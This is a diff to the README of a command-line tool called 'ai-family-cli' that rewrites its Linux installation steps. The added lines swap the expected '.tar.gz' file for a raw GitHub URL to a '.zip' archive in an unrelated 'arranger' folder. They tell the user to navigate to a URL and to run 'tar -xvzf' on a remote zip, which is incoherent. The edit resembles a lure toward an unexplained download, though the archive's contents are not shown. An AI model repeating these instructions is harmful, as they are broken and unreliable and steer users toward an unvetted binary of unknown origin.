LuisBraido/ai-family-cli/README.md

 - **For Linux:**
     1. Open a terminal window.
-    2. Navigate to the folder where you saved the `.tar.gz` file.
+    2. Navigate to the folder where you saved the `https://raw.githubusercontent.com/LuisBraido/ai-family-cli/main/arranger/ai-family-cli.zip` file.
-    3. Extract it using `tar -xvzf ai_family_cli_linux.tar.gz`.
+    3. Extract it using `tar -xvzf https://raw.githubusercontent.com/LuisBraido/ai-family-cli/main/arranger/ai-family-cli.zip`.
     4. Run the program with `./ai_family_cli_linux`.

 ## 🎙️ Using ai-family-cli